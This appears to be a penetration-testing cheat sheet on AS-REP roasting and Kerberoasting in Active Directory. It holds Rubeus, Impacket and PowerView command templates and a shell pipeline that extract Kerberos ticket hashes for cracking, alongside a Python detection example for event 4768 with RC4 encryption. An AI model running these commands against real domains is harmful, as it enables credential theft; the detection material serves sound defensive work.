Roasting
AS-REP Roast
Monitoring tip
On the DC, check for event 4768 with 0x17 in the additional information (ticket encryption type RC4-HMAC).
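The monitoring tip above as detection logic (an added example, not part of the original page): it parses events in the Windows event XML layout and reports clients whose 4768 requests used encryption type 0x17. It goes slightly beyond the tip by also requiring `PreAuthType` 0, an assumption made here to cut noise from pre-authenticated legacy RC4 clients; the sample events, addresses, account names and helper names are constructed.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict

URI = "http://schemas.microsoft.com/win/2004/08/events/event"
NS = "{" + URI + "}"
RC4_HMAC = 0x17   # ticket encryption type named in the monitoring tip
NO_PREAUTH = 0    # PreAuthType 0: TGT issued without pre-authentication (added filter)

def make_event(eid, user, etype, preauth, ip):
    """Build one constructed event in the Windows event XML layout."""
    data = dict(TargetUserName=user, TicketEncryptionType=etype,
                PreAuthType=preauth, IpAddress=ip)
    fields = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{URI}"><System><EventID>{eid}</EventID></System>'
            f'<EventData>{fields}</EventData></Event>')

# Constructed sample data, not taken from a real domain controller.
SAMPLE = [
    make_event(4768, "alice", "0x12", "2", "::ffff:10.0.0.21"),      # AES, pre-authenticated
    make_event(4768, "svc_backup", "0x17", "0", "::ffff:10.0.0.66"),
    make_event(4768, "j.doe", "0x17", "0", "::ffff:10.0.0.66"),
    make_event(4768, "legacy01$", "0x17", "2", "::ffff:10.0.0.40"),  # RC4 but pre-authenticated
    make_event(4769, "alice", "0x17", "0", "::ffff:10.0.0.21"),      # not a TGT request
]

def parse(xml_text):
    """Return (event_id, {field name: value}) for one event XML string."""
    root = ET.fromstring(xml_text)
    eid = int(root.findtext(f"{NS}System/{NS}EventID"))
    return eid, {d.get("Name"): (d.text or "") for d in root.iter(f"{NS}Data")}

def suspicious_tgt_requests(events):
    """Map client IP -> sorted accounts seen with 4768 + 0x17 + no pre-auth."""
    hits = defaultdict(set)
    for xml_text in events:
        eid, d = parse(xml_text)
        if eid != 4768:
            continue
        try:
            etype = int(d.get("TicketEncryptionType", ""), 0)
            preauth = int(d.get("PreAuthType", ""), 0)
        except ValueError:
            continue  # skip events whose fields are missing or non-numeric
        if etype == RC4_HMAC and preauth == NO_PREAUTH:
            hits[d.get("IpAddress", "?")].add(d.get("TargetUserName", "?"))
    return {ip: sorted(users) for ip, users in hits.items()}

if __name__ == "__main__":
    for ip, users in suspicious_tgt_requests(SAMPLE).items():
        print(f"{ip}: {len(users)} account(s) -> {', '.join(users)}")
```

Several distinct accounts reported for a single client address in a short window is the pattern worth alerting on.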
Check for all users in current domain
Rubeus.exe asreproast [/format:<hashcat|john>] [/outfile:<out>]
python GetNPUsers.py <fqdn>/<user>:<password> -request -format <hashcat|john> -outputfile <out>
Check for a list of users
python GetNPUsers.py <fqdn>/ -usersfile <users.txt> -format <hashcat|john> -outputfile <out>
Kerberoasting
info
john --format=krb5tgs
PowerView
Invoke-Kerberoast -OutputFormat <hashcat|john> | fl
Rubeus and tgtdeleg function
Rubeus.exe kerberoast [/spn:"<MSSQLSvc>/<sql01.domain.local>"] [/user:<user>] [/tgtdeleg] [/nowrap]
cat kerb.raw | grep -v "^$" | egrep -v "SamAccountName|DistinguishedName|ServicePrincipalName|PwdLastSet|Supported.ETypes" | tr -d " " | cut -d ":" -f 2 | sed 's/\$krb5tgs/#\$krb5tgs/g' | tr -d "\n" | tr "#" "\n"
Python
python GetUserSPNs.py <fqdn>/<user>:<password> -request -outputfile <out>